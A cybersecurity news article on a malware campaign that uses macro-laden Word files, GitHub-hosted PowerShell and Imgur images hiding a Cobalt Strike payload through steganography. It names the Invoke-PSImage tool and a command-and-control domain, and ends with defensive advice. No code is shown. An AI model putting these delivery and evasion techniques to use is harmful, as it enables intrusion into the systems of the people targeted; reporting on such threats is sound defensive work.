A New Github-hosted Malware Strain Abuses Github And Imgur
A new strand of malware strain has been found that utilizes word document files embedded with macros for downloading GitHub facilitated PowerShell scripts. This downloaded PowerShell script is further used to decrypt the Cobalt Strike Script on Windows by downloading a genuine image file from Imgur – an image hosting service. A lot of researchers believe that this malware is somehow linked to the Muddy Water (a state-backed APT – advanced persistent threat group that mostly targets Middle Eastern Countries and was first discovered in 2017).
As soon as the word document file is opened, the embedded macro is executed. This macro further runs the powershell.exe and inputs the location of the GitHub hosted PowerShell script. This PowerShell script is a one-line script that consists of info about downloading a genuine PNG image file from Imgur (image hosting service).
Pixel values of the downloaded picture are then utilized by the PowerShell script for calculating the upcoming stage payload. The practice of hiding secret data or codes or malicious payload in common basic files like an image file is termed as Steganography. And hiding payloads in image files is made possible by using tools like Invoke-PSImage. Such tools are capable of encoding PowerShell scripts inside the pixels on any PNG image file added with a single-line command for payload execution.
However, the decoded script received after manipulating the pixel values of the PNG image is the Cobalt Strike script. Cobalt strike is a pentesting toolkit that can allow a hacker to create shells, execute PowerShell scripts, or spawn a session to create a listener on the compromised devices. This decoded shellcode can even manipulate security tools by using an EICAR anti-virus file making the security tools believe that this isn’t a malicious payload but an ongoing anti-virus test.
The payload then uses a WinINET module to communicate and receive further instructions from the Command-and-Control Server. The Command-and-Control server associated domain “Mazzion1234-44451.portmap.host” is no longer accessible but still, the researchers were able to find that the domain was first recorded on December 20, 2020.
Exploiting legal services is becoming more and more common nowadays. Services like GitHub and Imgur have faced malicious codes. Not only this was an instance but many other instances have occurred like recently a wormable botnet Gitpaste-12 was discovered in both GitHub and Pastebin using payload to avoid detection and targeting routers, cameras, applications, etc. Services like Github, Discord, and Imgur are legal services utilizing which permits cybercriminals to veil their strides with no significant ventures. Employees of such organizations should be trained to identify all kinds of attacks whether it is phishing emails, through macros, etc., and should update their software and its patches quite frequently, suggests experts.
If you like this article, follow us on Twitter, Facebook, Instagram, and Linkedin.
